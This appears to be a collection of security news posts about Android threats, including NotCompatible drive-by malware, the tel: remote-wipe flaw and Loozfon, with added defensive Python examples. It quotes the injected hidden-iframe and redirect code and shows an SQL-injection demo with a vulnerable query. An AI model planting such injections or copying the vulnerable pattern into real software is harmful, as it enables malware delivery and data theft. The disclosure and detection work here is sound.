To verify the version of Adobe Flash Player installed on your system, access the About Flash Player page, or right-click on content running in Flash Player and select "About Adobe (or Macromedia) Flash Player" from the menu. If you use multiple browsers, perform the check for each browser you have installed on your system. To verify the version of Adobe Flash Player for Android, go to Settings > Applications > Manage Applications > Adobe Flash Player x.x. To verify the version of Adobe AIR installed on your system, follow the instructions in the Adobe AIR TechNote. Adobe also recommended that its Adobe AIR users update to 3.5.0.600.
While on the subject of security patches in Adobe products, a reminder that just a couple of weeks ago Adobe also plugged a buffer overflow vulnerability in its Shockwave Player. Also in late September, Adobe disclosed that it had been attacked and hackers were using a valid Adobe certificate to sign two malicious utilities used most often in targeted attacks. Adobe revoked the certificate Oct. 4.







Hacked Sites Infecting Android Mobiles With "drive-by" Malware

Analysts with Lookout Mobile Security have found websites that have been hacked to deliver malicious software to devices running Android, an apparent new attack vector crafted for the mobile operating system. The style of attack is known as a drive-by download and is common on the desktop: when someone visits a hacked website, malware can transparently infect the computer if it doesn't have up-to-date patches. The malware, dubbed NotCompatible by Lookout Security and initially reported by Reddit user Georgiabiker, is hosted in an iframe at the bottom of a manipulated web page. When a user arrives on the page, a file by the name of "Update.apk" begins downloading immediately. According to the official Lookout Mobile Security blog post:
How it Works :- 
In this specific attack, if a user visits a compromised website from an Android device, their web browser will automatically begin downloading an application—this process is commonly referred to as a drive by download.
When the suspicious application finishes downloading, the device will display a notification prompting the user to click on the notification to install the downloaded app.  In order to actually install the app to a device, it must have the “Unknown sources” setting enabled (this feature is commonly referred to as “sideloading”).  If the device does not have the unknown sources setting enabled, the installation will be blocked.
Technical Details :- 
Infected websites commonly have the following code inserted into the bottom of each page:
<iframe
style="visibility: hidden; display: none; display: none;"
src="hxxp://gaoanalitics.info/?id={1234567890-0000-DEAD-BEEF-133713371337}"></iframe>
We’re still in the process of assessing the full extent of infected sites; however, there are early indications that the number of affected sites could be numerous.
When a PC-based web browser accesses the site at gaoanalitics.info, a not found error is returned; however, if a web browser with the word “Android” in its user-agent header accesses the page, the following is returned:
<html><head></head><body><script type="text/javascript">window.top.location.href = "hxxp://androidonlinefix.info/fix1.php";</script></body></html>
This page causes the browser to immediately attempt to access the page at androidonlinefix.info. Like the previous site, only browsers sending an Android User-agent string will trigger a download (all other browsers will show a blank page). When visiting this page from an Android browser, the server returns an Android application, causing an Android browser to automatically download it.
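A site owner can check their own pages for the kind of injected frame described above. The following is an added example, not code from Lookout or from the original post: it flags iframes that are hidden by CSS or zero-sized and point at a host other than the page's own. The function names and the sample page (reserved example domains, one URL defanged as hxxp the way reports quote them) are constructed for illustration.

```python
from html.parser import HTMLParser
from urllib.parse import urlparse

# CSS fragments that make a frame invisible (compared with spaces removed).
HIDING_RULES = ("display:none", "visibility:hidden")


def _refang(url):
    # Reports quote URLs defanged as hxxp://; restore the scheme so urlparse works.
    return "http" + url[4:] if url.lower().startswith("hxxp") else url


class HiddenFrameFinder(HTMLParser):
    """Collects hosts of iframes that are invisible and served from another host."""

    def __init__(self, page_host):
        super().__init__()
        self.page_host = page_host.lower()
        self.findings = []

    def handle_starttag(self, tag, attrs):
        if tag != "iframe":
            return
        a = {name: (value or "") for name, value in attrs}
        style = a.get("style", "").replace(" ", "").lower()
        hidden = any(rule in style for rule in HIDING_RULES)
        # Zero- or one-pixel frames are invisible in practice as well.
        hidden = hidden or a.get("width") in ("0", "1") or a.get("height") in ("0", "1")
        host = (urlparse(_refang(a.get("src", ""))).hostname or "").lower()
        external = bool(host) and host != self.page_host
        if hidden and external:
            self.findings.append(host)


def find_hidden_external_iframes(html, page_host):
    finder = HiddenFrameFinder(page_host)
    finder.feed(html)
    finder.close()
    return finder.findings


# Constructed sample page: a visible video embed, a hidden same-site frame,
# and a hidden frame pointing at a third-party host.
SAMPLE_PAGE = """<html><body><p>Local news</p>
<iframe src="http://video.example.com/embed/1" width="560" height="315"></iframe>
<iframe style="display:none" src="/keepalive.html"></iframe>
<iframe style="visibility: hidden; display: none;"
 src="hxxp://redirector.example.net/?id=1"></iframe>
</body></html>"""

if __name__ == "__main__":
    for host in find_hidden_external_iframes(SAMPLE_PAGE, "www.example.com"):
        print("hidden iframe to external host:", host)
```

Because the redirector only answers browsers whose User-agent contains "Android", fetching the flagged URL from a desktop browser and seeing a not found error does not clear it.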





Samsung Galaxy S3, S2 & HTC Android Phones are Vulnerable to 'remote wipe' Hack

Yet again a large number of Android users have been warned of a security hole. Security experts have uncovered that millions of Android handsets including the Samsung Galaxy S3, Galaxy S2, HTC One X and HTC Desire can be wiped just by visiting a malicious website that embeds particular code in weblinks. A user with a vulnerable handset who visits a page and clicks a link containing the malicious code would see their phone wiped, losing personal data such as photos and texts as well as replaceable data such as contact details and apps. The flaw is caused by a security hole in some versions of Android's dialler software, which allows the "tel:" URL prefix to be used on a webpage to perform functions on the phone's dialling software. Normally that is useful for functions such as initiating a call on the handset directly from a site. But the tel: prefix can also be used to pass a string of non-numeric data to the dialler.
Special strings of characters can perform other functions; for example typing #06# on the dialler will display a phone's IMEI number. The flaw exploits a string that activates a factory reset of some phones because they do not force a user interaction before carrying out the function encoded in the string. The code would have to be embedded as a link to cause the user to activate it - but it would be easy to represent it as an innocent link to Google or any site. Pressing the link would initiate the wipe.
Users of vulnerable handsets may be able to install a third-party dialler and make that the default as protection against the "remote wipe" attack. Experts also pointed out that not all Android handsets have the capability for a remote wipe built in - although the number of models discovered with the vulnerability has grown since it became known on Tuesday.
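Sites that accept user-submitted HTML, and filtering proxies, can refuse the links this flaw depends on. The following is an added example, not code from the article or from any vendor: it audits URL-bearing attributes for tel: URIs whose payload, after HTML-entity and percent decoding, contains the `*` or `#` characters that dialler function codes use. The function names and the sample markup are constructed, and the only code used in the sample is the IMEI display string quoted above.

```python
from html.parser import HTMLParser
from urllib.parse import unquote

# Attributes that can carry a URL the browser will hand to the dialler.
URL_ATTRS = {"href", "src", "action", "data"}


def mmi_payload(value):
    """Return the decoded tel: payload if it contains '*' or '#', else None.

    Ordinary phone numbers need neither character, so this is a deliberately
    conservative policy: any tel: URI carrying them is reported.
    """
    v = (value or "").strip()
    if v[:4].lower() != "tel:":
        return None
    # '#' normally has to be written as %23 inside a URL, so decode first.
    payload = unquote(v[4:])
    return payload if any(ch in payload for ch in "*#") else None


class TelLinkAuditor(HTMLParser):
    """Records (tag, attribute, decoded payload) for every suspicious tel: URI."""

    def __init__(self):
        super().__init__()
        self.findings = []

    def handle_starttag(self, tag, attrs):
        # HTMLParser has already resolved entities such as &#35; in values.
        for name, value in attrs:
            if name in URL_ATTRS:
                payload = mmi_payload(value)
                if payload is not None:
                    self.findings.append((tag, name, payload))


def audit_tel_links(html):
    auditor = TelLinkAuditor()
    auditor.feed(html)
    auditor.close()
    return auditor.findings


# Constructed sample: one normal call link, the same dialler code hidden two
# different ways, and an ordinary web link with a fragment.
SAMPLE_HTML = """
<a href="tel:+15550100">Call the office</a>
<a href="tel:%2306%23">Search</a>
<a href=" TEL:&#35;06&#35;">Search</a>
<a href="https://example.com/page#top">Back to top</a>
"""

if __name__ == "__main__":
    for tag, attr, payload in audit_tel_links(SAMPLE_HTML):
        print("dialler code in <%s %s>: %s" % (tag, attr, payload))
```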
Dylan Reeve, a New Zealand-based TV editor who first brought the flaw to wide notice, says that Samsung Galaxy phones which use Android 4.1 will be safe from the hack. But that still leaves millions of Galaxy S2 and some S3 models which will not have had the correct revision of the firmware rolled out to them and which could be hit.  
Though the vulnerability was fixed in Android's core code earlier this year, that code has not been propagated to every handset in use. The fact that the flaw existed in handsets from Samsung and HTC - the two biggest vendors of Android handsets - also suggests that a huge number of existing handsets could include the outdated code.

Samsung said in a statement that it has already provided a patch for the Galaxy S3, but it is not clear how long that will take for operator approval and rollout. In general software updates to any phone have to first be tested and approved by the carrier supporting the phone. Samsung said it is testing a patch for the Galaxy S2, but had no information on when it will be available or how it will be distributed. But HTC has issued a statement saying that "our devices do not support a USSD code to factory reset option." This means that they should not be vulnerable to the exploit described here.


-Source (Guardian)




Android Vulnerability Assessment Tool Named WebContentResolver



WebContentResolver is an open source Android assessment tool, designed by MWR InfoSecurity Labs, which allows you to find Content-Provider vulnerabilities. Though it is still an alpha release, you can at least start using it and report any bugs that are found.

What is an Android Content-Provider? 
A Content-Provider is one of Android's IPC endpoints; it is commonly used to implement data storage in applications and to offer access to this data to other applications on the device. Content-Providers store, add, alter, delete and retrieve data and make it accessible to all applications. They're the only way to share data across applications, as there is no common storage area that all Android packages can access. Android ships with a number of default content providers for common data types, such as audio, video, images, personal contact information, browser bookmarks and the contacts list. A Content-Provider is basically an interface that clients use indirectly, most generally through ContentResolver objects. Unfortunately, because of unsupervised use, these Content-Providers are vulnerable, which allows third-party applications or compromised applications to gain access to sensitive data. Common vulnerabilities, such as directory traversal or SQL injection, are regularly found on the Android platform in providers installed as part of the Android system or by third-party applications. As these issues are similar to issues that are commonly found in web applications, it would be desirable to test Content-Providers in the same way web applications are tested, using Android WebContentResolver. This allows us to leverage the current skill set of web application testers and the currently available tool set for web application testing.
WebContentResolver runs on an Android device or emulator and will offer a web service interface to all installed Content-Providers. This not only allows a security tester to use a web browser to test for vulnerabilities, but also to leverage the power of current web application testing tools, such as sqlmap, to find and exploit vulnerabilities in Content-Providers.
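The SQL injection class mentioned above comes from a provider pasting a caller's selection string into its own query. The following is an added example, not code from WebContentResolver or from any Android provider: it models a provider's query path in Python with sqlite3 rather than Android's Java API, and places the vulnerable form beside a hardened one. The table, columns and function names are hypothetical and the rows are constructed.

```python
import sqlite3

# Columns the hypothetical provider is willing to expose to other apps.
PUBLIC_COLUMNS = {"id", "title", "body"}


def open_store():
    """In-memory stand-in for a provider's backing database (constructed rows)."""
    db = sqlite3.connect(":memory:")
    db.execute(
        "CREATE TABLE notes (id INTEGER PRIMARY KEY, title TEXT, "
        "body TEXT, is_private INTEGER)"
    )
    db.executemany(
        "INSERT INTO notes (title, body, is_private) VALUES (?, ?, ?)",
        [("groceries", "milk, eggs", 0), ("bank pin", "constructed secret", 1)],
    )
    return db


def query_vulnerable(db, projection, selection):
    # The caller's selection text is concatenated after the privacy filter.
    # AND binds tighter than OR, so a selection containing OR escapes the filter.
    sql = "SELECT %s FROM notes WHERE is_private = 0 AND %s" % (
        ", ".join(projection), selection)
    return db.execute(sql).fetchall()


def query_hardened(db, projection, filters):
    # Callers name columns and values; they never supply SQL text.
    if not projection:
        raise ValueError("empty projection")
    bad = [c for c in list(projection) + list(filters) if c not in PUBLIC_COLUMNS]
    if bad:
        raise ValueError("column not exposed: %r" % bad)
    where = "is_private = 0" + "".join(" AND %s = ?" % c for c in filters)
    sql = "SELECT %s FROM notes WHERE %s" % (", ".join(projection), where)
    # Values are bound as parameters, so quotes in them are data, not syntax.
    return db.execute(sql, list(filters.values())).fetchall()


if __name__ == "__main__":
    db = open_store()
    hostile = "title = 'x' OR 1=1"
    print("vulnerable:", query_vulnerable(db, ["title"], hostile))
    print("hardened:  ", query_hardened(db, ["title"], {"title": hostile}))
```

The hardened form validates column names against an allowlist because identifiers cannot be bound as parameters; only values can.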


Install the WebContentResolver.apk on the phone or emulator under test. This creates its icon in the Launcher menu, which we use to start it. By default, this starts a local web server listening on port 8080.




VLC Media Player (Beta) for Android is Now Available


VLC is a popular media player for Windows, Mac and Linux computers. It was one of the first apps that could support virtually any video codec, which means that as long as you’re trying to watch a video without DRM, you can probably use VLC.
The developers have been working on an Android port of VLC for a while, and now it looks like we’re one step closer to a release. VLC for Android is now in beta testing, and you can sign up to request an invitation to participate in the private beta. There’s a key difference between VLC for desktop computers and for Android though. Most Android phones and tablets have processors that support hardware acceleration for just a few video codecs. So while VLC may be able to decode videos that aren’t supported by your device’s chipset, it will have to use software to do that, and the performance will likely vary from device to device and video file to video file.
For instance, most recent Android devices have hardware support for H.264 video files, which means you can typically play 720p or even 1080p HD video in that format on some devices. But it’s much less common (although not impossible) to find a device that has hardware support for MKV or DiVX video files. VLC may let you watch movies in those formats anyway, but I wouldn’t expect HD videos to work well unless you have hardware support.
In other words, while it’s certainly pretty cool that VLC is set to become one of the first Swiss Army Knife video players that can run on Windows, Mac, Linux, and Android, I’d be surprised if it works much better than RockPlayer, MoboPlayer, or any of the other video players currently available for Android.


-News Source (Video LAN & Mobiputing)




Tenable Network Security Released Nessus Android Application

“Network security isn’t a 9-5 job,” said Ron Gula, CEO of Tenable Network Security. “The ability to conduct vulnerability scans and review results anytime from anywhere is exactly what enterprise IT and security professionals expect from their software and service providers, and it’s what they need to keep their networks safe, 24/7.” Tenable is the first company to release an Android-based mobile application for vulnerability scanning. The Nessus Android application is available at no cost at the Android Marketplace and is located under the productivity category. It allows users to take advantage of the advanced capabilities of the Android user interface.

Features of the Nessus Android application include remote starting, stopping and pausing of network scans as well as the ability to analyze scan results. Mobile access speeds the Incident Response process – allowing a security professional who is responding to an incident to quickly log into a Nessus scanner during a meeting to find a host with a given vulnerability.

Tenable Network Security, Inc., the leader in Unified Security Monitoring (USM) and creator of the widely-used, award-winning enterprise SecurityCenter and Nessus® vulnerability scanner, today announced that it has released an Android application for its Nessus Vulnerability Scanner, enabling Nessus users to remotely connect to a Nessus server, launch scans and review reports from their Android devices.


Google Patches Sidejacking Vulnerability


Google has been rolling out a server-side patch for the ClientLogin authentication protocol vulnerability that affects 99.7% of Android smartphones.
"We recently started rolling out a fix which addresses a potential security flaw that could, under certain circumstances, allow a third party access to data available in calendar and contacts. This fix requires no action from users and will roll out globally over the next few days," said a Google spokesperson via email.

 Google's fix comes in response to a warning, published earlier this month by researchers at the University of Ulm in Germany, that Android devices could be exploited in a sidejacking-like attack. Just as website session cookies can be stolen (sidejacked), allowing attackers to impersonate a user, attackers could sniff data being sent to and from Android smartphones that are connected to unsecured Wi-Fi networks--by using a tool such as Wireshark--and capture tokens for any Google service that uses the ClientLogin authentication protocol. Applications that use this protocol include Google Calendar, Contacts, and Picasa, as well as third-party applications for Facebook and Twitter.
Android smartphone users running the latest OS, 2.3.4, were already protected against the vulnerability. But 99.7% of Android users are still on older operating systems.
Accordingly, Google's solution has been a server-side fix that forces Android devices to use HTTPS--to keep data encrypted--when syncing with the Google Contacts or Calendar, so that authentication credentials can't be intercepted. "The great news is that it doesn't require a software update on the Android devices themselves--meaning the fix is automatic and worldwide. Effectively this is a silent fix," said Graham Cluley, senior technology consultant at Sophos, in a blog post.
No attacks have been seen that exploit the vulnerability, and a fix is still in the works for Picasa. For now, Picasa users can mitigate the vulnerability by avoiding unsecured Wi-Fi networks, which would prevent their authentication credentials from being stolen.
Security-wise, Google's server-side patch is a crucial move because most cell phone carriers rarely push patches or OS updates to their customers. Because of that, some industry watchers had worried that Google would have difficulty securing older devices. For now, it's dodged that bullet, but in the future, major flaws could still pose a problem. "Concerns still remain as to how easy it would be to fix a serious security vulnerability on the Android devices themselves, given that Google is so reliant on manufacturers and carriers to push out OS updates," said Cluley.


Android Malware 'Loozfon' Targeting Female Android Users -Said Symantec

We are used to seeing malware target men by enticing them to view videos or pictures of a sexually-oriented nature. But here the story is totally different: antivirus firm Symantec has recently discovered 'Android.Loozfon', a rare example of malware that targets female Android users.
According to the official Symantec blog: A group of scammers is attempting to lure female Android users in Japan into downloading an app by sending emails stating how the recipient can easily make some money. The email includes a link to a site that appears to be designed to assist women to make money simply by sending emails. When a certain link on the site is clicked, Android.Loozfon is downloaded onto the device. Other links direct the user to a dating service site that likely attempts to charge money to use the service, which supposedly helps women meet rich men.



If this trick does not work, the criminal group has another trick up its sleeve. It also sends spam that states that the sender of the email can introduce the recipient to wealthy men. When the link included in the body of the email is clicked, the malware is automatically downloaded onto the device. The downloaded app is titled “Will you win?” in Japanese. It has nothing to do with earning extra income or wealthy men.

If the app is installed and launched, it counts down from two to zero and then states that the user has lost. The app is programmed to lose every time, although there is nothing to either lose or win. It steals contact details stored on the device as well as the phone number of the device, which is the main goal of the malware. The scammers are likely harvesting email addresses in order to send spam to the contacts they were able to steal to lure them to the dating service site and/or sell the data to another group of spammers.





